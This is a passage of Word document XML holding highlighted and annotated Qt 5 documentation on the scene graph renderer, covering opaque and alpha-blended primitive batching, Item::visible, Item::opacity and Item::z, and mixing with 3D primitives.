          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>means that the fragment shader does not need to run for pixels or blocks of pixels that are obscured</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Beware that</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the renderer still needs to take these nodes into account and the </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vertex shader</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is still run for every vertex in these primitives, </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>so if the application knows that something is fully obscured, the best thing to do is to explicitly hide it using</w:t>
      </w:r>
      <w:r w:rsidR="009A641D" w:rsidRPr="009A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2053" w:anchor="visible-prop" w:history="1">
        <w:r w:rsidRPr="009A641D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::visible</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009A641D" w:rsidRPr="009A641D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidR="009A641D" w:rsidRPr="009A641D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2054" w:anchor="opacity-prop" w:history="1">
        <w:r w:rsidRPr="009A641D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::opacity</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="009A641D" w:rsidRPr="009A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Recommendation qml.</w:t>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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9A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="009A641D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2055" w:anchor="z-prop" w:history="1">
        <w:r w:rsidRPr="00815754">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::z</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009A641D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is used to control an Item's stacking order relative to its siblings. It has </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no direct relation to the renderer and OpenGL's Z-buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="007959FF">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1686" w:name="alpha-blended-primitives"/>
      <w:bookmarkStart w:id="1687" w:name="_Toc483000896"/>
      <w:bookmarkStart w:id="1688" w:name="_Toc483003887"/>
      <w:bookmarkStart w:id="1689" w:name="_Toc483604240"/>
      <w:bookmarkStart w:id="1690" w:name="_Toc483605460"/>
      <w:bookmarkEnd w:id="1686"/>
      <w:r w:rsidRPr="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Alpha Blended Primitives</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1687"/>
      <w:bookmarkEnd w:id="1688"/>
      <w:bookmarkEnd w:id="1689"/>
      <w:bookmarkEnd w:id="1690"/>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9A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Once opaque primitives have been drawn, the renderer will disable</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>glDepthMask</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enable</w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GL_BLEND</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>render all alpha blended primitives in a back-to-front manner</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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9A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Batching of alpha blended primitives requires a bit more effort in the renderer as elements that are overlapping need to be rendered in the correct order for alpha blending to look correct</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Relying on the Z-buffer alone is not enough</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The renderer does a pass over all alpha blended primitives and will look at their bounding rect in addition to their material state to figure out which elements can be batched and which can not</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/visualcanvas_overlap.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00815754">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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png"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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png"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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png"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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png"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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png"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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png"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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png"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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png"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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png"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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png"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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png"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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png"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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png"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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png"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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png"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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png"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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png"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"http://doc.qt.io/qt-5/images/visualcanvas_overlap.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1045" type="#_x0000_t75" alt="" style="width:194.7pt;height:78.9pt">
            <v:imagedata r:id="rId2056" r:href="rId2057"/>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Pr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>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In the </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>left-most case</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the blue backgrounds can be drawn in one call and the two text elements in another call, as the texts only overlap a background which they are stacked in front of. In the </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>right-most case</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the background of "Item 4" overlaps the text of "Item 3" so in this case, </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>each of backgrounds and texts need to be drawn using separate calls</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="002352BA" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Z-wise, the alpha primitives are interleaved with the opaque nodes and may trigger early-z when available, but again, setting</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2058" w:anchor="visible-prop" w:history="1">
        <w:r w:rsidRPr="00CA563B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::visible</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to false is always faster</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation qml </w:t>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="007959FF">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1691" w:name="mixing-with-3d-primitives"/>
      <w:bookmarkStart w:id="1692" w:name="_Toc483000897"/>
      <w:bookmarkStart w:id="1693" w:name="_Toc483003888"/>
      <w:bookmarkStart w:id="1694" w:name="_Toc483604241"/>
      <w:bookmarkStart w:id="1695" w:name="_Toc483605461"/>
      <w:bookmarkEnd w:id="1691"/>
      <w:r w:rsidRPr="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mixing with 3D primitives</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1692"/>
      <w:bookmarkEnd w:id="1693"/>
      <w:bookmarkEnd w:id="1694"/>
      <w:bookmarkEnd w:id="1695"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scene graph can support pseudo 3D and proper 3D primitives</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For instance, one can implement a "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>page curl" effect</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2059" w:history="1">
        <w:r w:rsidRPr="00815754">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ShaderEffect</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
